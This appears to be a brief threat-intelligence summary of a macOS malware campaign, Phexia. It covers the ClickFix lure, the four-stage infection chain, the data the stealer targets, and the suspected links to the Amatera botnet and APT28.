Malware Insights: macOS Phexia Campaign
7 hours ago
- #Botnet Campaign
- #macOS Malware
- #APT28
- A macOS Phexia campaign uses a ClickFix attack that tricks users into executing malicious commands in Terminal via Cmd+C and Cmd+V from compromised websites.
- The malware employs a multi-stage attack: Stage 1 installs a LaunchAgent for persistence, Stage 2 connects to C2 servers via Telegram bot for domain updates, Stage 3 gathers UUID, username, and password via deceptive dialogs, and Stage 4 deploys the Phexia Stealer.
- The Phexia Stealer targets crypto wallets, browsers, password extensions, keychains, cookies, history, and Telegram auth data on macOS, with C2 domains hosted on vdsina.com VPS servers behind Cloudflare.
- The campaign is linked to the Amatera botnet and potentially APT28, with Ukrainian network focus, using PHP-based C2 servers on Apache/Ubuntu with multiple open ports, possibly for obfuscation via portspoof.